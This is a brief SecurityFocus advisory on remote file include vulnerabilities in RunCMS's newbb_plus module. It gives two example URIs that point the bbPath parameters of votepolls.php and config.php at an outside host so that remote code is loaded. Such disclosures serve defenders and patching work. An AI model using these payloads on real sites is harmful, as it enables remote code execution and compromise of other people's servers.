RunCMS Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/modules/newbb_plus/votepolls.php?bbPath[path]=http://www.example2.com
http://www.example.com/modules/newbb_plus/config.php?bbPath[root_theme]=http://www.example2.com


 

Privacy Statement
Copyright 2010, SecurityFocus